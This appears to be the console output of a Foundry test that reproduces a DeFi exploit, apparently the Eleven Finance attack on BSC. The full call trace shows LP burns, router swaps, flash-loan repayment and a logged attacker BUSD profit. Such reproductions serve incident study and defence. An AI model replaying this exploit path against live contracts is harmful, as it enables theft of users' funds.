    │   │   │   ├─ [69977] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::burn(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd) [staticcall]
    │   │   │   │   │   └─ ← [Return] 6418974696689822071606311 [6.418e24]
    │   │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd) [staticcall]
    │   │   │   │   │   └─ ← [Return] 4965483646586654212928250 [4.965e24]
    │   │   │   │   ├─ [354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x07d80AE6f36A5E08Dca74cE884A24D39dB9934ed
    │   │   │   │   ├─ emit Transfer(from: 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd, to: 0x0000000000000000000000000000000000000000, value: 823030594158097624422918 [8.23e23])
    │   │   │   │   ├─ [26091] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transfer(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 948757512124185592358179 [9.487e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd, to: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 948757512124185592358179 [9.487e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000000c8e83f6f303626526523
    │   │   │   │   │   │   @ 0xb264a0c361b2673836727fd5e88d97870e16469493057b60c56722faf1d9194e: 0x000000000000000000000000000000000000000000054f4550c8cde1d8ed4c27 → 0x00000000000000000000000000000000000000000004865d11599dabb29ae704
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [3271] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 733924050745721441362608 [7.339e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd, to: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 733924050745721441362608 [7.339e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x8bb7630b861534f3d3aad447fe81a0548b79c8e611dc240d52ecf7c18c91a2bf: 0x000000000000000000000000000000000000000000041b7b686916ae67aab2fa → 0x0000000000000000000000000000000000000000000380114e2acdb8ce38904a
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000003426ab3a47661cae10df → 0x00000000000000000000000000000000000000000000cf90c578905bb620338f
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd) [staticcall]
    │   │   │   │   │   └─ ← [Return] 5470217184565636479248132 [5.47e24]
    │   │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd) [staticcall]
    │   │   │   │   │   └─ ← [Return] 4231559595840932771565642 [4.231e24]
    │   │   │   │   ├─ emit Sync(reserve0: 5470217184565636479248132 [5.47e24], reserve1: 4231559595840932771565642 [4.231e24])
    │   │   │   │   ├─ emit Burn(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0: 948757512124185592358179 [9.487e23], amount1: 733924050745721441362608 [7.339e23], to: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x60d26af5000000041b7b686916ae67aab2fa000000054f4550c8cde1d8ed4c27 → 0x60d26af50000000380114e2acdb8ce38904a00000004865d11599dabb29ae704
    │   │   │   │   │   @ 11: 0x000000000000000000000015cf00d3585a66d3970b6d78320355bb1d19957c16 → 0x00000000000000000000000fd6940a99d8374f2b444ec1a39cdc1ec083990728
    │   │   │   │   │   @ 0: 0x000000000000000000000000000000000000000000049b24c8398e018be93ba2 → 0x00000000000000000000000000000000000000000003ecdc34479e30ec7de19c
    │   │   │   │   │   @ 0x8bb7630b861534f3d3aad447fe81a0548b79c8e611dc240d52ecf7c18c91a2bf: 0x00000000000000000000000000000000000000000000ae4893f1efd09f6b5a06 → 0
    │   │   │   │   └─ ← [Return] 948757512124185592358179 [9.487e23], 733924050745721441362608 [7.339e23]
    │   │   │   └─ ← [Return] 948757512124185592358179 [9.487e23], 733924050745721441362608 [7.339e23]
    │   │   ├─ [33661] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokens(948757512124185592358179 [9.487e23], 624113299151540843640146 [6.241e23], [0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096, 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56], Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1624403177 [1.624e9])
    │   │   │   ├─ [893] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 5470217184565636479248132 [5.47e24], 4231559595840932771565642 [4.231e24], 1624402677 [1.624e9]
    │   │   │   ├─ [6037] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::transferFrom(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd, 948757512124185592358179 [9.487e23])
    │   │   │   │   ├─ emit Transfer(from: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd, value: 948757512124185592358179 [9.487e23])
    │   │   │   │   ├─ emit Approval(owner: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640562616321315821634741102665 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0xffffffffffffffffffffffffffffffffffffffffffff9b8be04867e4ecd6cd6c → 0xfffffffffffffffffffffffffffffffffffffffffffed2a3a0d937aec6846849
    │   │   │   │   │   @ 0xb264a0c361b2673836727fd5e88d97870e16469493057b60c56722faf1d9194e: 0x00000000000000000000000000000000000000000004865d11599dabb29ae704 → 0x000000000000000000000000000000000000000000054f4550c8cde1d8ed4c27
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000c8e83f6f303626526523 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [18342] 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd::swap(0, 624113299151540843640146 [6.241e23], Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [3271] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 624113299151540843640146 [6.241e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd, to: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 624113299151540843640146 [6.241e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000cf90c578905bb620338f → 0x0000000000000000000000000000000000000000000153ba056794b50d4328e1
    │   │   │   │   │   │   @ 0x8bb7630b861534f3d3aad447fe81a0548b79c8e611dc240d52ecf7c18c91a2bf: 0x0000000000000000000000000000000000000000000380114e2acdb8ce38904a → 0x00000000000000000000000000000000000000000002fbe80e3bc95f77159af8
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [512] 0x42F6f551ae042cBe50C739158b4f0CAC0Edb9096::balanceOf(0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd) [staticcall]
    │   │   │   │   │   └─ ← [Return] 6418974696689822071606311 [6.418e24]
    │   │   │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x401479091d0F7b8AE437Ee8B054575cd33ea72Bd) [staticcall]
    │   │   │   │   │   └─ ← [Return] 3607446296689391927925496 [3.607e24]
    │   │   │   │   ├─ emit Sync(reserve0: 6418974696689822071606311 [6.418e24], reserve1: 3607446296689391927925496 [3.607e24])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 948757512124185592358179 [9.487e23], amount1In: 0, amount0Out: 0, amount1Out: 624113299151540843640146 [6.241e23], to: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x60d26af50000000380114e2acdb8ce38904a00000004865d11599dabb29ae704 → 0x60d26af500000002fbe80e3bc95f77159af8000000054f4550c8cde1d8ed4c27
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return] [948757512124185592358179 [9.487e23], 624113299151540843640146 [6.241e23]]
    │   │   ├─ [3271] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::transfer(0x51e6D27FA57373d8d4C256231241053a70Cb1d93, 956739847753799401426648 [9.567e23])
    │   │   │   ├─ emit Transfer(from: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x51e6D27FA57373d8d4C256231241053a70Cb1d93, value: 956739847753799401426648 [9.567e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000153ba056794b50d4328e1 → 0x0000000000000000000000000000000000000000000089210ccf6996b3c7da09
    │   │   │   │   @ 0x0971fc1a37c2ffb1d6875d8f062f5229192e868c1ad5d6c36193a75f16224e2b: 0x0000000000000000000000000000000000000000000268eaef75379cd0211997 → 0x000000000000000000000000000000000000000000033383e80d62bb299c686f
    │   │   │   └─ ← [Return] true
    │   │   ├─ [0] console::log("-------Finish exploit-------") [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 647573873780118425950729 [6.475e23]
    │   │   ├─ [0] console::log("attacker BUSD balance after is", 647573 [6.475e5]) [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─  storage changes:
    │   │   │   @ 12: 0 → 1
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000572449f8f7e84fb5ad03
    │   │   └─ ← [Stop]
    │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x51e6D27FA57373d8d4C256231241053a70Cb1d93) [staticcall]
    │   │   └─ ← [Return] 14636662710025123981741 [1.463e22]
    │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x51e6D27FA57373d8d4C256231241053a70Cb1d93) [staticcall]
    │   │   └─ ← [Return] 3870051394073442874321007 [3.87e24]
    │   ├─ emit Sync(reserve0: 14636662710025123981741 [1.463e22], reserve1: 3870051394073442874321007 [3.87e24])
    │   ├─ emit Swap(sender: 0xc71e2F581b77De945C8A7A191b0B238c81f11eD6, amount0In: 0, amount1In: 956739847753799401426648 [9.567e23], amount0Out: 0, amount1Out: 953869628210538003222368 [9.538e23], to: Eleven: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x60d26af50000000332e84fc12735b20be8f7000000000319747fd267bdcae9ad → 0x60d26af5000000033383e80d62bb299c686f000000000319747fd267bdcae9ad
    │   └─ ← [Stop]
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 48.33s (42.54s CPU time)

Ran 2 test suites in 49.69s (49.47s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
